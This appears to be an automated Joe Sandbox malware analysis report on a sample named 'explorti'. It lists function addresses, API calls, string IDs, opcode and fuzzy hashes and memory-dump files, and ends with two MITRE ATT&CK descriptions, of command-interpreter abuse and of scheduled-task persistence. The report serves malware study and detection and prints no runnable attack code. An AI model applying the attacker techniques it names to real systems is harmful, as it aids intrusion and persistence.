Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.q$\s**$`zr
API String ID: 3366076730-2816059304
Opcode ID: 5b640331722f4879133492ae5e5ab679399b2f5e7c349ff1d85e6c6dea748eec
Instruction ID: 904cdf1b9e080cf8edb07a163958266a35335b5f27af40c78256dd6c6d8ce364
Opcode Fuzzy Hash: 5b640331722f4879133492ae5e5ab679399b2f5e7c349ff1d85e6c6dea748eec
Instruction Fuzzy Hash: 0FA127B0A01629CFDB25CFA8D98479EBBF0FF48710F198159E819AB351E7799D01CB90

Function 00754AD4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00754C8A
__freea.LIBCMT ref: 00754C93
__freea.LIBCMT ref: 00754CB6

Strings

\s**, xrefs: 00754ADB

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: __freea
String ID: \s**
API String ID: 240046367-1123597553
Opcode ID: 97fd72a64cd6bcb3539f07dece78190560da067d526fa91d74501c73cd3c2ad8
Instruction ID: 2eff5f7e0330a75ca6fd5226b880034422d42ae8c020b8b5e896361a6fe71548
Opcode Fuzzy Hash: 97fd72a64cd6bcb3539f07dece78190560da067d526fa91d74501c73cd3c2ad8
Instruction Fuzzy Hash: 0C510372901216FBEB259F64DC45FFB36A9EF8475AF154128FD0497140E7B8DC8486A0

Function 0072C382 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0072C428
__Xtime_diff_to_millis2.LIBCPMT ref: 0072C472
_xtime_get.LIBCPMT ref: 0072C491

Strings

\s**, xrefs: 0072C388

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: _xtime_get$Xtime_diff_to_millis2
String ID: \s**
API String ID: 2858396081-1123597553
Opcode ID: da7fedb8e64cf2a301c6d7f8aadfe6370a88ccf6b997ad19c0dd95cc85b7d8e3
Instruction ID: 598da7751af7da02e6108f12e06bf31cf316b72eb2cb2a9f77621f0cbd5bd1e3
Opcode Fuzzy Hash: da7fedb8e64cf2a301c6d7f8aadfe6370a88ccf6b997ad19c0dd95cc85b7d8e3
Instruction Fuzzy Hash: 8B51A530900165CFCF21EF24E5E59BE7BB4FF24310B25849AD8069B256D778ED41CBA5

Function 0071DFD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 0071E01B
recv.WS2_32(?,?,00000008,00000000), ref: 0071E050

Strings

\s**, xrefs: 0071DFE4

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: recv
String ID: \s**
API String ID: 1507349165-1123597553
Opcode ID: 9541e10539f61206316ec2fe80bc8c8623b1de6aebb8a8f6b4d47e95809dea4b
Instruction ID: 6e4af6de4e6a0b641bfe561099b1deb825f54c2c9fa3d8d59a0291517569f420
Opcode Fuzzy Hash: 9541e10539f61206316ec2fe80bc8c8623b1de6aebb8a8f6b4d47e95809dea4b
Instruction Fuzzy Hash: 013128B19002489FD710CB6CDC85BEE77A8EB0C774F104225E915E72C1DA7DA884CFA4

Function 00712440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0071247E

Strings

P#q, xrefs: 00712486
'krd+w, xrefs: 00712440
P#q, xrefs: 0071246D

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'krd+w$P#q$P#q
API String ID: 2659868963-1510963494
Opcode ID: e3f029e470ea36a0e6cc2710d1b3eb03f3f04f072cc4fdb795e8fba0f6bff143
Instruction ID: 8b2c40ad88ee7cc96d0336e78e92bc8a90d92870620fbe10cb82ba2dd6f46d6d
Opcode Fuzzy Hash: e3f029e470ea36a0e6cc2710d1b3eb03f3f04f072cc4fdb795e8fba0f6bff143
Instruction Fuzzy Hash: F9F0E5B191020CA7C714EBE8D80AC8AB7ACDE15310B008A35FA69E7501FBB8FA5487D1

Function 00712520 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00712552

Strings

\s**, xrefs: 00712526
P#q, xrefs: 00712547
P#q, xrefs: 0071255D

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#q$P#q$\s**
API String ID: 2659868963-2729880630
Opcode ID: 86a4929b0869c5190ac8859bc95f85543da67173199318b1350faa57cd65f82c
Instruction ID: 8138de412bf035f7fb269932be9619d63e1462c1bac05830258a0c2c062bacdd
Opcode Fuzzy Hash: 86a4929b0869c5190ac8859bc95f85543da67173199318b1350faa57cd65f82c
Instruction Fuzzy Hash: 33F0A771E1120DDBC715DF68D84198EBBF4AF55300F1082AEE84567201EB745A55CBD9

Function 0074C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0074CA37

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 1f261072dca00382767c1a5c4b3fc60a06c51000fec6879011763557bba0dfa2
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: BBB13772A022859FDB52CF28C8817BEBBE5EF55340F1481AAD845EB341E73C9D41CB60

Function 0074FB7F Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0074FDA6
__fassign.LIBCMT ref: 0074FDC3

Strings

\s**, xrefs: 0074FB8A

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: __fassign
String ID: \s**
API String ID: 3965848254-1123597553
Opcode ID: 939bdddaeef0d0db4da26ae8699d1172d9679c99a035cb77debc001a1b5a28e7
Instruction ID: 5955b88955bbd4434845167727cb89491bd45769d488b7de79812b54b7f3eb16
Opcode Fuzzy Hash: 939bdddaeef0d0db4da26ae8699d1172d9679c99a035cb77debc001a1b5a28e7
Instruction Fuzzy Hash: CDC1B971D012589FCF15CFA8C8809EDBBB5FF49304F28416AE855BB242E734AE46CB60

Function 0071DAF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

\s**, xrefs: 0071DAF6, 0071DC3F
list too long, xrefs: 0071DFAD

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: \s**$list too long
API String ID: 0-1276746692
Opcode ID: d1546cfb7657ba5e7b4569ed3aa6bcf5efd3ea7bdc0bc458ced668760db3d61b
Instruction ID: c893920fc2b2f3a17cfcef3ed02b6a2324beafa63ab86bcfa606f3bc1e2c8ab4
Opcode Fuzzy Hash: d1546cfb7657ba5e7b4569ed3aa6bcf5efd3ea7bdc0bc458ced668760db3d61b
Instruction Fuzzy Hash: CA61A3B0D44719DBDB20DF24DC49B99B7B8EF14300F1081A9E80DA7281EB78AE95CF56

Function 0074F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0074F263

Strings

`'w, xrefs: 0074F235
8"w, xrefs: 0074F30B

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"w$`'w
API String ID: 3903695350-1951729946
Opcode ID: cde5f3a7a3e9e5d562efd751be23abed0f84eefcf6e18354554e8a2275836b24
Instruction ID: 6f246faa39c911f3b9a9a40f0fc56ecadda00e54cf908ec52d7bd9c7270d81db
Opcode Fuzzy Hash: cde5f3a7a3e9e5d562efd751be23abed0f84eefcf6e18354554e8a2275836b24
Instruction Fuzzy Hash: 3E313C31A40305EFEB61AF78E949B6A73E9BF44360F144429E45AD7151DF79EC808B21

Function 00713930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00713962
__Mtx_init_in_situ.LIBCPMT ref: 007139A1

Strings

pBq, xrefs: 00713940

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pBq
API String ID: 3366076730-1325260143
Opcode ID: 83f15d2a1cbbf73310b9d5a7cde106801f841f46cefbb74eaaae2c7812ab488d
Instruction ID: edcc9c6fc246c10203844a2d739385ae2fc9517d861d9ebc7c83c835599f3910
Opcode Fuzzy Hash: 83f15d2a1cbbf73310b9d5a7cde106801f841f46cefbb74eaaae2c7812ab488d
Instruction Fuzzy Hash: 8E4116B0501B059FD720CF19C588B9ABBF4FF44315F148619E96A8B381E7B9EA55CB80

Function 007128C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0071299F

Strings

\s**, xrefs: 007128D5
P#q, xrefs: 00712991

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#q$\s**
API String ID: 2659868963-1506950115
Opcode ID: e2a39282ba993fdcc0c677733ff264fe522519afcb382d96a9fdc00fd3227407
Instruction ID: 4eeb3884d745a7c3709ed44bea287d1e2a2caeb929ecfef9b562b0f6eba2f663
Opcode Fuzzy Hash: e2a39282ba993fdcc0c677733ff264fe522519afcb382d96a9fdc00fd3227407
Instruction Fuzzy Hash: A03195B1A102099FC714DF58C845BDEFBF9EF49720F10462AF815A7781E778A954CBA0

Function 0071E270 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0071E409

Strings

\s**, xrefs: 0071E280
invalid stoi argument, xrefs: 0071E404

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: \s**$invalid stoi argument
API String ID: 909987262-936183416
Opcode ID: 22b9f9e176c8257b4a6d8693453380ff795ce37baab366fe0f1600d58299a161
Instruction ID: ee46ac43efcdbc23aa6b8925dcf5491827b7b69976d831ffd014d9187c9391ac
Opcode Fuzzy Hash: 22b9f9e176c8257b4a6d8693453380ff795ce37baab366fe0f1600d58299a161
Instruction Fuzzy Hash: 17F09671900754DBD730AB289C0AAAB33D8EB55350F508835FD5493152E77CAD40D6F7

Function 007122A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 007122D2

Strings

\s**, xrefs: 007122A6
P#q, xrefs: 007122C7

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#q$\s**
API String ID: 2659868963-1506950115
Opcode ID: 0fa788326743b1320a0ebcd1723c6a13717dc15a7ab04766ed9e1767bd90e2e5
Instruction ID: 7f141566830226227638e59520ba4b1ca449919182c1e80ec9d3633f4ef071b9
Opcode Fuzzy Hash: 0fa788326743b1320a0ebcd1723c6a13717dc15a7ab04766ed9e1767bd90e2e5
Instruction Fuzzy Hash: 1DF0A771E1020CDBC715DF68D84198EBBF49F55300F1082AEE80567201EA745A55CB99

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
